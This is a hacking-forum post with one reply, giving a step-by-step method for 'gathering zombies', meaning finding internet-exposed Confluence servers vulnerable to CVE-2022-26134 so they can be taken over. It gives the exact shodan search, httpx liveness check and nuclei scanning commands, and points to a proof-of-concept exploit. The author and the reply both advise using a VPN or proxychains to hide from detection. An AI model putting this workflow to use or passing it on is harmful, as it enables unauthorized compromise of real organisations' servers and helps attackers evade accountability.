
How to gather zombies using shodan

by User8200 - 08 December, 2022 - 05:39 PM
(This post was last modified: 08 December, 2022 - 05:39 PM by User8200.)
Hello, this is my second thread on this forum. Anyway, here are a few ways to gather zombies using Shodan. (NOTE: if you have a .edu mail it will work even better because of the limitation.)
Requirements:
  1. Linux machine
  2. Shodan API (free version is OK but with a .edu domain is better)
  3. VPN (recommend ProtonVPN or Mullvad)
  4. nuclei engine (https://github.com/projectdiscovery/nuclei) and nuclei templates (https://github.com/projectdiscovery/nuclei-templates)
  5. httpx to check for live hosts
  6. PoC of the CVE
ATTENTION:
IF YOU DO NOT KNOW HOW TO HIDE YOURSELF THEN DON'T TRY IT.
NOTE: we will use "X-Confluence" CVE-2022-26134; this can work on almost any other RCE CVEs. Remember to do some research on the CVE that you're trying to gather and exploit.
First we will gather our zombies:
cmd:"shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txt"
Second we will check for alive hosts using httpx:
cmd:"cat hosts.txt | httpx > alive_hosts.txt"
Third we will scan for vulnerable hosts with nuclei engine:
(after the installation "cd to nuclei-templates/cves/2022" )
cmd:"nuclei -bs 50 -c 50 -l alive_hosts.txt -t CVE-2022-26134.yaml"
That's all, thanks for reading this post. Always remember, stay safe and keep hacking!
proof pics:

+++ https://anonfiles.com/EbLf21L3ye/prove1_png +++
+++ https://anonfiles.com/W3L823L2y8/proove_png +++
Happy Hacking!
Hackerman

This is a bump
This post is by a banned member (typical_name)
Looking at this, sending large requests over a VPN can leak your IP; I think a proxy (proxychains) with a no-leak option is better.
